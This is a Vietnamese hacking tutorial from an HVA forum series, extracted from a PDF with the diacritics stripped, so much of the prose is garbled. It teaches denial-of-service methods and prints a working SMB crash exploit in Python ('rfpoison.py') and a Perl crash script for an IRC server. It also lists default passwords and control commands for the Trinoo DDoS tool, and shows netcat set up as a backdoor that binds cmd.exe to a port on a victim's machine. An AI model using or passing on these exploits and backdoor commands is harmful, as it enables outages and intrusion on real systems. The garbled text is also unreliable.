http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=21&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=21&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=21&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=21&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32


28/41

c . ) Teardrop :

_ Nh ta bit , tt c cc d liu chuyn i trn mng t h thng ngun n h thng chu phi tri qua 2 qu trnh : d liu s c chia ra thnh cc mnh nh h thng ngun,mi mnh u phi c mt gi tr offset nht nh xc nh v tr ca mnh trong gi d

liu c chuyn i. Khi cc mnh ny n h thng ch, h thng ch s da vo gi troffset sp xp cc mnh li vi nhau theo th t ng nh ban u . Li dng s h , tach cn gi n h thng ch mt lot gi packets vi gi tr offset chng cho ln nhau. Hthng ch s khng th no sp xp li cc packets ny, n khng iu khin c v c th

b crash, reboot hoc ngng hot ng nu s lng gi packets vi gi tr offset chng choln nhau qu ln !

d . ) SYN Attack :

_ Trong SYN Attack, hacker s gi n h thng ch mt lot SYN packets vi a ch ipngun khng c thc. H thng ch khi nhn c cc SYN packets ny s gi tr li cc ach khng c thc v ch I nhn thng tin phn hi t cc a ch ip gi . V y lcc a ch ip khng c thc, nn h thng ch s s ch i v ch v cn a cc ``request``ch i ny vo b nh , gy lng ph mt lng ng k b nh trn my ch m ng ra l

phi dng vo vic khc thay cho phi ch i thng tin phn hi khng c thc ny . Nu tagi cng mt lc nhiu gi tin c a ch IP gi nh vy th h thng s b qu ti dn n bcrash hoc boot my tnh . == > nm du tay .

e . ) Land Attack :

_ Land Attack cng gn ging nh SYN Attack, nhng thay v dng cc a ch ip khng cthc, hacker s dng chnh a ch ip ca h thng nn nhn. iu ny s to nn mt vnglp v tn gia trong chnh h thng nn nhn , gia mt bn cn nhn thng tin phn hicn mt bn th chng bao gi gi thng tin phn hi i c . == > Gy ng p lng ng .

f . ) Smurf Attack :

_Trong Smurf Attack, cn c ba thnh phn: hacker (ngi ra lnh tn cng), mng khuchi (s nghe lnh ca hacker) v h thng ca nn nhn. Hacker s gi cc gi tin ICMP na ch broadcast ca mng khuch i. iu c bit l cc gi tin ICMP packets ny c ach ip ngun chnh l a ch ip ca nn nhn . Khi cc packets n c a ch broadcastca mng khuch i, cc my tnh trong mng khuch i s tng rng my tnh nn nhn gi gi tin ICMP packets n v chng s ng lot gi tr li h thng nn nhn cc gitin phn hi ICMP packets. H thng my nn nhn s khng chu ni mt khi lng khng

l cc gi tin ny v nhanh chng b ngng hot ng, crash hoc reboot. Nh vy, ch cngi mt lng nh cc gi tin ICMP packets i th h thng mng khuch i s khuch ilng gi tin ICMP packets ny ln gp bI . T l khuch i ph thuc vo s mng tnh ctrong mng khuch I . Nhim v ca cc hacker l c chim c cng nhiu h thngmng hoc routers cho php chuyn trc tip cc gi tin n a ch broadcast khng qua chlc a ch ngun cc u ra ca gi tin . C c cc h thng ny, hacker s d dng tinhnh Smurf Attack trn cc h thng cn tn cng . == > mt my lm chng si nh , chcmy chm li ta nh cho thua .

g . ) UDP Flooding :

_ Cch tn cng UDP i hi phi c 2 h thng my cng tham gia. Hackers s lm cho hthng ca mnh i vo mt vng lp trao i cc d liu qua giao thc UDP. V gi mo ach ip ca cc gi tin l a ch loopback ( 127.0.0.1 ) , ri gi gi tin ny n h thng ca


29/41

nn nhn trn cng UDP echo ( 7 ). H thng ca nn nhn s tr li li cc messages do127.0.0.1( chnh n ) gi n , kt qu l n s i vng mt vng lp v tn. Tuy nhin, cnhiu h thng khng cho dng a ch loopback nn hacker s gi mo mt a ch ip camt my tnh no trn mng nn nhn v tin hnh ngp lt UDP trn h thng ca nnnhn . Nu bn lm cch ny khng thnh cng th chnh my ca bn s b y .

h . ) Tn cng DNS :_ Hacker c th i mt li vo trn Domain Name Server ca h thng nn nhn ri cho chn mt website no ca hacker. Khi my khch yu cu DNS phn tch a ch b xmnhp thnh a ch ip, lp tc DNS ( b hacker thay i cache tm thI ) s i thnh ach ip m hacker cho ch n . Kt qu l thay v phi vo trang Web mun vo th ccnn nhn s vo trang Web do chnh hacker to ra . Mt cch tn cng t chi dch v ththu hiu !.

g . ) Distributed DoS Attacks ( DDos ) :

_ DDoS yu cu phi c t nht vi hackers cng tham gia. u tin cc hackers s c thmnhp vo cc mng my tnh c bo mt km, sau ci ln cc h thng ny chng trnhDDoS server. By gi cc hackers s hn nhau n thi gian nh s dng DDoS client ktni n cc DDoS servers, sau ng lot ra lnh cho cc DDoS servers ny tin hnh tncng DDoS n h thng nn nhn .

h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) :

_ y c l l kiu tn cng li hi nht v lm boot my tnh ca i phng nhanh gn nht. Cch lm th cng tng t nh DDos nhng thay v tn cng bng nhiu my tnh th ngItn cng ch cn dng mt my tn cng thng qua cc server ln trn th gii . Vn vi

phng php gi mo a ch IP ca victim , k tn cng s gi cc gi tin n cc servermnh nht , nhanh nht v c ng truyn rng nht nh Yahoo .v.v , cc server ny s

phn hi cc gi tin n a ch ca victim . Vic cng mt lc nhn c nhiu gi tinthng qua cc server ln ny s nhanh chng lm nghn ng truyn ca my tnh nn nhnv lm crash , reboot my tnh . Cch tn cng ny li hi ch ch cn mt my c ktni Internet n gin vi ng truyn bnh thng cng c th nh bt c h thng cng truyn tt nht th giI nu nh ta khng kp ngn chn . Trang Web HVA ca chng tacng b DoS va ri bi cch tn cng ny y .

40 . ) K thut DoS Web bng Python :

_ K thut ny ch c th s dng duy nht trn WinNT , v bn cn phi c thi gian th my

tnh ca nn nhn mi b down c ._ Bn hy download Pyphon ti http://www.python.org/ s dng ._ Bn hy save on m sau ln file rfpoison.py .

CODEimport stringimport structfrom socket import *import sysdef a2b(s):

bytes = map(lambda x: string.atoi(x, 16),

string.split(s))data = string.join(map(chr, bytes), ``)return data
http://www.python.org/http://www.python.org/http://www.python.org/http://www.python.org/


30/41

def b2a(s):bytes = map(lambda x: `%.2x` % x, map(ord, s))return string.join(bytes, ` `)

# Yu cu tp hp NBSSnbss_session = a2b(``````

81 00 00 48 20 43 4b 46 44 454e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 4341 43 41 43 41 43 41 43 41 43 41 00 20 45 48 4542 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 4643 43 41 43 41 43 41 43 41 43 41 41 41 00 00 0000 00``````)

# To SMBcrud = (# Yu cu SMBnegprot``````ff 53 4d 42 72 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 4320 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 204e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 3000 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00``````,# Yu cu setup SMB X``````ff 53 4d 42 73 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ffff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 0000 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f55 50 00 55 6e 69 78 00 53 61 6d 62 61 00``````,# Yu cu SMBtconX

``````ff 53 4d 42 75 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 0000 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 5645 52 5c 49 50 43 24 00 49 50 43 00``````,# Yu cu khI to SMBnt X``````ff 53 4d 42 a2 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00

00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 0007 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 0000 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00


31/41

00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 7276 73 76 63 00``````,# yu cu bin dch SMB``````ff 53 4d 42 25 00

00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 0000 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 4950 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 0000 00 01 00 00 00 30 16 30 16 00 00 00 00 01 0000 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 785a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1cc9 11 9f e8 08 00 2b 10 48 60 02 00 00 00``````,# SMBtrans Request``````ff 53 4d 42 25 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 0000 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 4950 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 0000 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 0000 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 005c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 0056 00 45 00 52 00 00 00 00 00 01 00 00 00 01 0000 00 00 00 00 00 ff ff ff ff 00 00 00 00``````)crud = map(a2b, crud)def smb_send(sock, data, type=0, flags=0):d = struct.pack(`!BBH`, type, flags, len(data))#print `send:`, b2a(d+data)sock.send(d+data)def smb_recv(sock):s = sock.recv(4)assert(len(s) == 4)type, flags, length = struct.unpack(`!BBH`, s)

data = sock.recv(length)assert(len(data) == length)#print `recv:`, b2a(s+data)return type, flags, datadef nbss_send(sock, data):sock.send(data)def nbss_recv(sock):s = sock.recv(4)assert(len(s) == 4)return sdef main(host, port=139):

s = socket(AF_INET, SOCK_STREAM)s.connect(host, port)nbss_send(s, nbss_session)


32/41

nbss_recv(s)for msg in crud[:-1]:smb_send(s, msg)smb_recv(s)smb_send(s, crud[-1]) # no response to thiss.close()

if __name__ == `__main__`:print `Sending poison...`,main(sys.argv[1])

print `done.`

c th lm down c server ca i phng bn cn phi c thi gian DoS , nukhng c iu kin ch i tt nht bn khng nn s dng cch ny . Nhng vc thcho bit th c ng khng ?AnhdendayHVA

Nhng hiu bit c bn nht tr thnh Hacker - Phn 741 . ) Tn cng DDoS thng qua Trinoo :

_ Bn bit DDoS attack l g ri phi khng ? Mt cuc tn cng DDoS bng Trinoo cthc hin bi mt kt ni ca Hacker Trinoo Master v ch dn cho Master pht ng mtcuc tn cng DDoS n mt hay nhiu mc tiu. Trinoo Master s lin lc vi nhngDeadmons a nhng a ch c dn n tn cng mt hay nhiu mc tiu trong khongthi gian xc nh .

_ C Master v Deamon u c bo v bng Passwd . ch khi chng ta bit passwd th mic th iu khin c chng , iu ny khng c g kh khn nu chng ta l ch nhn thcs ca chng . Nhng passwd ny thng c m ho v bn c th thit lp khi bin dchTrinoo t Source ----- > Binnary. Khi c chy , Deadmons s hin ra mt du nhc v ch

passwd nhp vo , nu passwd nhp sai n s t ng thot cn nu passwd c nhp ngth n s t ng chy trn nn ca h thng .

attacker$ telnet 10.0.0.1 27665Trying 10.0.0.1Connected to 10.0.0.1Escape character is `^]`.kwijiboConnection closed by foreign host. < == Bn nhp sai

attacker$ telnet 10.0.0.1 27665Trying 10.0.0.1Connected to 10.0.0.1Escape character is `^]`.

betaalmostdonetrinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]trinoo > < == bn vo c h thng trinoo

_ y l vi passwd mc nh :

l44adsl``: pass ca trinoo daemon .``gorave``: passwd ca trinoo masterserverkhi startup .


33/41

``betaalmostdone``: passwd iu khin t xa chung cho trinoo master .``killme``: passwd trinoo master iu khin lnh ``mdie`` .

_ y l mt s lnh dng iu khin MasterServer:

CODEdie------------------------------------------------ ------------Shutdown.quit----------------------------------------------- -------------Log off.mtimer N-------------------------------------------------- --t thI gian tn cng DoS , vI Nnhn gi tr t 1-- > 1999 giy .dos IP------------------------------------------------- ------Tn cng n mt a ch IP xc nh .mdie pass----------------------------------------------- ----V hiu ho tt c cc Broadcast , nunh passwd chnh xc . Mt lnh c gi ti (``d1e l44adsl``) Broadcast Shutdown chng. Mt passwd ring bit s c t cho mc nymping---------------------------------------------- ----------Gi mt lnh ping ti (``png l44adsl``)cc Broadcast.mdos ------------------------------------------Send nhiu lnh DOS (``xyz l44adsl 123:ip1:ip2``)n cc Broadcast.info----------------------------------------------- --------------Hin th thng tin v Trinoo .msize---------------------------------------------- ------------t kch thc m cho nhng gi tinc send i trong sut thI gian DoS.nslookup host----------------------------------------------X c nh tn thit b ca Hostm MasterTrinoo ang chy .usebackup------------------------------------------ ---------Chuyn tI cc file Broadcast sao luc to bi lnh killdead.

bcast---------------------------------------------- -------------Lit k danh sch tt c cc Broadcastc th khai thc .help [cmd] --------------------------------------------------- a ra danh sch cc lnh .mstop---------------------------------------------- -------------Ngng li cc cuc tn cng DOS .

_ y l mt s lnh dng iu khin Trinoo Deadmons:

CODEaaa pass IP------------------------------------------------- ---Tn cng n a ch IP xc nh .GI gi tin UDP (0-65534) n cng ca UDP ca a ch IP xc nh trong mt khongthi gian xc nh c mc nh l 120s hay t 1-- > 1999 s .

bbb pass N-------------------------------------------------- ---t thI gian gii hn cho cc cuctn cng DOS .

Shi pass----------------------------------------------- ---------Gi chui *HELLO* ti dnh schMasterServer c bin dch trong chng trnh trn cng 31335/UDP.

png pass----------------------------------------------- --------Send chui Pong tI Master Serverpht hnh cc lnh iu khin trn cng 31335/UDP.die pass----------------------------------------------- ---------Shutdown Trinoo.rsz N-------------------------------------------------- ----------L kch thc ca b m c dng tn cng , n c tnh bng byte .xyz pass 123:ip1:ip3---------------------------------------- tn cng DOS nhiu mc tiu cng lc.

( Da theo hng dn ca huynh Binhnx2000 )

Cn nhiu on m v cch ng dng DoS lm , cc bn chu kh tm hiu thm nh .
http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32


34/41

Nhng ng tn cng lung tung , nht l server ca HVA , coi chng khng thu c hiu qum cn b lock nick na

Ht phn 6

Anhdenday

HVaonline.netNhng hiu bit c bn nht tr thnh Hacker - Phn 7 / 19-12-2004

42 . ) K thut n cng DoS vo WircSrv Irc Server v5.07 :

_ WircSrv IRC l mt Server IRC thng dng trn Internet ,n s b Crash nu nh b ccHacker gi mt Packet ln hn gi tr ( 65000 k t ) cho php n Port 6667.Bn c th thc hin vic ny bng cch Telnet n WircSrv trn Port 6667:

Nu bn dng Unix:

[[email protected]$ telnet irc.example.com 6667Trying example.com...Connected to example.com.Escape character is `^]`.[buffer]

Windows cng tng t:

telnet irc.example.com 6667

Lu : [buffer] l Packet d liu tng ng vi 65000 k t .Tuy nhin , chng ta s crash n rt n gin bng on m sau ( Cc bn hy nhn vo onm v t mnh gii m nhng cu lnh trong , cng l mt trong nhng cch tp luyncho s phn x ca cc hacker khi h nghin cu . No , chng ta hy phn tch n mt cchcn bn ):

CODE#!/usr/bin/perl #< == on m ny cho ta bit l dng cho cc lnh trong perluse Getopt::Std;use Socket;getopts(`s:`, \%args);

if(!defined($args{s})){&usage;}my($serv,$port,$foo,$number,$data,$buf,$in_addr,$p a ddr,$proto);$foo = ``A``; # y l NOP$number = ``65000``; # y l tt c s NOP$data .= $foo x $number; # kt qu ca $foo times $number$serv = $args{s}; # lnh iu khin server t xa$port = 6667; # lnh iu khin cng t xa , n c mc nh l 6667$buf = ``$data``;$in_addr = (gethostbyname($serv))[4]AnhdendayHVA



35/41

47 . ) Cc cng c cn thit hack Web :_ i vi cc hacker chuyn nghip th h s khng cn s dng nhng cng c ny m h strc tip setup phin bn m trang Web nn nhn s dng trn my ca mnh test li .

Nhng i vi cc bn mi vo ngh th nhng cng c ny rt cn thit , hy s dngchng mt vi ln bn s bit cch phi hp chng vic tm ra li trn cc trang Web nn

nhn c nhanh chng nht . Sau y l mt s cng c bn cn phi c trn my lm nca mnh :

_ Cng c th 1 : Mt ci proxy dng che du IP v vt tng la khi cn ( Cch to 1ci Proxy ti by phn 7 , cc bn hy xem li nh ) .

_ Cng c th 2 : Bn cn c 1 shell account, ci ny thc s quan trng i vi bn . Mtshell account tt l 1 shell account cho php bn chy cc chng trnh chnh nh nslookup,host, dig, ping, traceroute, telnet, ssh, ftp,...v shell account cn phi ci chng trnh GCC( rt quan trng trong vic dch (compile) cc exploit c vit bng C) nh MinGW, Cygwinv cc dev tools khc.Shell account gn ging vi DOS shell,nhng n c nhiu cu lnh v chc nng hn DOS .Thng thng khi bn ci Unix th bn s c 1 shell account, nu bn khng ci Unix th bnnn ng k trn mng 1 shell account free hoc nu c ai ci Unix v thit lp cho bn 1shell account th bn c th log vo telnet (Start -- > Run -- > g Telnet) dng shell account. Sau y l 1 s a ch bn c th ng k free shell account :http://www.freedomshell.com/http://www.cyberspace.org/shell.ht mlhttp://www.ultrashell.net/

_Cng c th 3 :NMAP l Cng c qut cc nhanh v mnh. C th qut trn mng dinrng v c bit tt i vi mng n l. NMAP gip bn xem nhng dch v no ang chytrn server(services / ports : webserver , ftpserver , pop3,...),server ang dng h iu hnhg,loi tng la mservers dng,...v rt nhiu tnh nng khc.Ni chung NMAP h trhu ht cc k thut qut nh : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (halfopen),... NMAP c nh gi l cng c hng u ca cc Hacker cng nh cc nh qun trmng trn th gii.Mi thng tin v NMAP bn tham kho ti http://www.insecure.org/ .

_ Cng c th 4 : Stealth HTTP Security Scanner l cng c qut li bo mt tuyt vi trnWin32. N c th qut c hn 13000 li bo mt v nhn din c 5000 exploits khc.

_ Cng c th 5 : IntelliTamper l cng c hin th cu trc ca mt Website gm nhng thmc v file no, n c th lit k c c th mc v file c set password. Rt tin cho vicHack Website v trc khi bn Hack mt Website th bn phi nm mt s thng tin caAdmin v Website .

_ Cng c th 6 : Netcat l cng c c v ghi d liu qua mng thng qua giao thc TCPhoc UDP. Bn c th dng Netcat 1 cch trc tip hoc s dng chng trnh script khc

iu khin Netcat. Netcat c coi nh 1 exploitation tool do n c th to c lin kt giabn v servercho vic c v ghi d liu ( tt nhin l khi Netcat c ci trn 1 server blI ). Mi thng tin v Netcat bn c th tham kho ti http://www.l0pht.com/.

_ Cng c th 7 : Active Perl l cng c c cc file Perl ui *.pl v cc exploit thngc vit bng Perl . N cn c s dng thi hnh cc lnh thng qua cc file *.pl .

_ Cng c th 8 : Linux l h iu hnh hu ht cc hacker u s dng._ Cng c th 9 : L0phtCrack l cng c s mt Crack Password ca Windows NT/2000 .

_ Cch Download ti by ri nn khng ni y , cc bn khi Download nh ch ncc phin bn ca chng , phin bn no c s ln nht th cc bn hy Down v m si v ns c thm mt s tnh nng m cc phin bn trc cha c . Nu down v m cc bn khng

bit s dng th tm li cc bi vit c c hng dn bn Box ngh . Nu vn khng thyth c post bi hi , cc bn bn s tr li cho bn .
http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.freedomshell.com/http://www.cyberspace.org/shell.hthttp://www.ultrashell.net/http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.insecure.org/http://www.insecure.org/http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.l0pht.com/http://www.l0pht.com/http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.freedomshell.com/http://www.freedomshell.com/http://www.freedomshell.com/http://www.cyberspace.org/shell.hthttp://www.cyberspace.org/shell.hthttp://www.cyberspace.org/shell.hthttp://www.ultrashell.net/http://www.ultrashell.net/http://www.ultrashell.net/http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.insecure.org/http://www.insecure.org/http://www.insecure.org/http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.l0pht.com/http://www.l0pht.com/http://www.l0pht.com/


36/41

48 . ) Hng dn s dng Netcat :

a . ) Gii thiu : Netcat l mt cng c khng th thiu c nu bn mun hack mt websiteno v n rt mnh v tin dng . Do bn cn bit mt cht v Netcat .

b . ) Bin dch :_ i vi bn Netcat cho Linux, bn phi bin dch n trc khi s dng.

- hiu chnh file netcat.c bng vi: vi netcat.c+ tm dng res_init(); trong main() v thm vo trc 2 du ``/``: // res_init();+ thm 2 dng sau vo phn #define (nm u file):

#define GAPING_SECURITY_HOLE#define TELNET

- bin dch: make linux- chy th: ./nc -h- nu bn mun chy Netcat bng nc thay cho ./nc, bn ch cn hiu chnh li bin mi trngPATH trong file ~/.bashrc, thm vo ``:.``PATH=/sbin:/usr/sbin:...:.

_ Bn Netcat cho Win khng cn phi compile v c sn file nh phn nc.exe. Ch vy giinn v chy l xong.c . ) Cc ty chn ca Netcat :

_ Netcat chy ch dng lnh. Bn chy nc -h bit cc tham s:

CODEC:\ > nc -hconnect to somewhere: nc [-options] hostname port [ports] ...listen for inbound: nc -l -p port [options] [hostname] [port]options:-d ----------- tch Netcat khi ca s lnh hay l console, Netcat s chy ch steath(khnghin th trn thanh Taskbar)-e prog --- thi hnh chng trnh prog, thng dng trong ch lng nghe-h ----------- gi hng dn-i secs ----- tr hon secs mili giy trc khi gi mt dng d liu i-l ------------- t Netcat vo ch lng nghe ch cc kt ni n-L ------------ buc Netcat ``c`` lng nghe. N s lng nghe tr li sau mi khi ngt mt ktni.-n ------------ ch dng a ch IP dng s, chng hn nh 192.168.16.7, Netcat s khngthm vn DNS-o ------------ file ghi nht k vo file-p port ----- ch nh cng port

-r yu cu Netcat chn cng ngu nhin(random)-s addr ----- gi mo a ch IP ngun l addr-t ------------- khng gi cc thng tin ph i trong mt phin telnet. Khi bn telnet n mttelnet daemon(telnetd), telnetd thng yu cu trnh telnet client ca bn gi n cc thng tin

ph nh bin mi trng TERM, USER. Nu bn s dng netcat vi ty chn -t telnet,netcat s khng gi cc thng tin ny n telnetd.-u ------------- dng UDP(mc nh netcat dng TCP)-v ------------- hin th chi tit cc thng tin v kt ni hin ti.-vv ----------- s hin th thng tin chi tit hn na.-w secs ---- t thi gian timeout cho mi kt ni l secs mili giy-z ------------- ch zero I/O, thng c s dng khi scan port

Netcat h tr phm vi cho s hiu cng. C php l cng1-cng2. V d: 1-8080 ngha l


37/41

1,2,3,..,8080

d . ) Tm hiu Netcat qua cc VD :

_ Chpbannerca web server :

V d: nc n 172.16.84.2, cng 80CODEC:\ > nc 172.16.84.2 80HEAD / HTTP/1.0 (ti y bn g Enter 2 ln)HTTP/1.1 200 OKDate: Sat, 05 Feb 2000 20:51:37 GMTServer: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2OpenSSL/0.9.6 PHP/4.0.4pl1Connection: closeContent-Type: text/html

bit thng tin chi tit v kt ni, bn c th dng v ( -vv scho bit cc thng tin chi tit hn na)

C:\ > nc -vv 172.16.84.1 80

CODE172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA(UNKNOWN) [172.16.84.1] 80 (?) openHEAD / HTTP/1.0HTTP/1.1 200 OKDate: Fri, 04 Feb 2000 14:46:43 GMTServer: Apache/1.3.20 (Win32)Last-Modified: Thu, 03 Feb 2000 20:54:02 GMTETag: ``0-cec-3899eaea``Accept-Ranges: bytesContent-Length: 3308Connection: closeContent-Type: text/htmlsent 17, rcvd 245: NOTSOCK

Nu mun ghi nht k, hy dng -o . V d:

nc -vv -o nhat_ki.log 172.16.84.2 80

xem file nhat_ki.log xem th n ghi nhng g nh :

CODE< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap

< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb


38/41

< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: ``0-cec-< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea``..Accep< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio

< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm< 000000f0 6c 0d 0a 0d 0a # l....

du < ngha l server gi n netcatdu > ngha l netcat gi n server

_ Qut cng :Bn hy chy netcat vi ty chn z . Nhng qut cng nhanh hn, bn hy dng -n vnetcat s khng cn thm vn DNS. V d scan cc cng TCP(1- > 500) cahost172.16.106.1

CODE[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500(UNKNOWN) [172.16.106.1] 443 (?) open(UNKNOWN) [172.16.106.1] 139 (?) open(UNKNOWN) [172.16.106.1] 111 (?) open(UNKNOWN) [172.16.106.1] 80 (?) open(UNKNOWN) [172.16.106.1] 23 (?) open

nu bn cn scan cc cng UDP, dng -u

CODE[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500(UNKNOWN) [172.16.106.1] 1025 (?) open(UNKNOWN) [172.16.106.1] 1024 (?) open(UNKNOWN) [172.16.106.1] 138 (?) open(UNKNOWN) [172.16.106.1] 137 (?) open(UNKNOWN) [172.16.106.1] 123 (?) open(UNKNOWN) [172.16.106.1] 111 (?) open

_ Bin Netcat thnh mt trojan :Trn my tnh ca nn nhn, bn khi ng netcat vo ch lng nghe, dng ty chn l( listen ) v -p port xc nh s hiu cng cn lng nghe, -e yu cu netcat thi hnh 1chng trnh khi c 1 kt ni n, thng l shell lnh cmd.exe ( i vi NT) hoc /bin/sh(ivi Unix). V d:

CODEE:\ > nc -nvv -l -p 8080 -e cmd.exelistening on [any] 8080 ...connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159sent 0, rcvd 0: unknown socket error

Trn my tnh dng tn cng, bn ch vic dng netcat ni n my nn nhn trn cng


39/41

nh, chng hn nh 8080

CODEC:\ > nc -nvv 172.16.84.2 8080(UNKNOWN) [172.16.84.2] 8080 (?) openMicrosoft Windows 2000 [Version 5.00.2195]

